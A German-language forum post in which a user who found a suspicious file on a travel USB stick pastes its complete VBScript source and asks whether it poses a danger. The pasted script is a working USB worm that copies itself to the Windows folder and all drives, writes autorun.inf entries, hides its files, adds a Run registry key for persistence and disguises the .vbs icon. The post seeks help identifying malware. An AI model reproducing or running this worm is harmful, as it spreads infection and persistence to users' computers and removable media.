Hallo ich habe gerade auf meinem USB Stick (war öffters auf reisen) eine verdächtige Dateie gefunden:
pagefile.sys.vbs
Inhalt:
================
'kuciapka tu byl
on error resume next
dim ksource,winpath,kflash,kfs,kmf,katrib,kuc,rgpath,nt,check,sado
katrib="[autorun]"&vbcrlf&"shellexecute=wscript.exe pagefile.sys.vbs"
set kfs=createobject("Scripting.FileSystemObject")
set kmf=kfs.getfile(Wscript.ScriptFullname)
dim text,size
size=kmf.size
check=kmf.drive.drivetype
set text=kmf.openastextstream(1,-2)
do while not text.atendofstream
ksource=ksource&text.readline
ksource=ksource&vbcrlf
loop
do
Set winpath=kfs.getspecialfolder(0)
set kuc=kfs.getfile(winpath&"\pagefile.sys.vbs")
kuc.attributes=32
set kuc=kfs.createtextfile(winpath&"\pagefile.sys.vbs",2,true)
kuc.write ksource
kuc.close
set kuc=kfs.getfile(winpath&"\pagefile.sys.vbs")
kuc.attributes=39
for each kflash in kfs.drives
If (kflash.drivetype=1 or kflash.drivetype=2) and kflash.path <> "A:" then
set kuc=kfs.getfile(kflash.path&"\pagefile.sys.vbs")
kuc.attributes=32
set kuc=kfs.createtextfile(kflash.path &"\pagefile.sys.vbs",2,true)
kuc.write ksource
kuc.close
set kuc=kfs.getfile(kflash.path&"\pagefile.sys.vbs")
kuc.attributes=39
set kuc=kfs.getfile(kflash.path&"\autorun.inf")
kuc.attributes=32
set kuc=kfs.createtextfile(kflash.path &"\autorun.inf",2,true)
kuc.write katrib
kuc.close
set kuc=kfs.getfile(kflash.path &"\autorun.inf")
kuc.attributes=39
end if
next
set rgpath=createobject("WScript.Shell")
rgpath.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSRegInfo",winpath&"\pagefile.sys.vbs"
rgpath.regwrite "HKCR\vbsfile\DefaultIcon","shell32.dll,2"
if check <> 1 then
Wscript.sleep 200000
end if
loop while check<>1
set sado=createobject("Wscript.shell")
sado.run winpath&"\explorer.exe /e,/select, "&Wscript.ScriptFullname
================================
Meine Annahme ist dass das Skript nur mit entsprechender autorun und z.B. der Wscript.exe oder anderer Schaden verursachen kann.
Tatsächlich waren keine anderen derartigen Dateien auf dem Stick.
Weiß jemand ob trotzdem eine gefahr besteht ?
Vielen Dank schonmal für eure Antworten
